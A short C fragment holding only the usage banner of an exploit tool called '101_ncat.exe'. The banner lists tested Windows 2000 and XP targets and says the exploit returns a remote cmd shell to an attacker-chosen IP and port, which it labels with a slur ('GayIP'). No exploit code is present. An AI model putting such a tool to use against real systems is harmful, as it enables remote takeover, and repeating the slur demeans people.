
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int printf (char*) ;

void usage(char* us)
{
 printf("USAGE: 101_ncat.exe Target VulnIP VulnPORT GayIP GayPORT\n");
 printf("TARGETS:                               \n");
 printf("      [+] 1. Win2k SP4  Server English  (*)\n");
 printf("      [+] 1. Win2k SP4  Pro.   English  (*)\n");
 printf("      [+] 2. WinXP SP1  Pro.   English  (*)\n");
 printf("      [+] 2. WinXP SP1a Pro.   English  (*)\n");
 printf("      [+] 2. WinXP SP2  Pro.   English  (*)\n");
 printf("NOTE:                               \n");
 printf("      The exploit reverse a cmd to GayIP:GayPORT :>\n");
 printf("      A wildcard (*) mean Tested.\n");
 return;
}
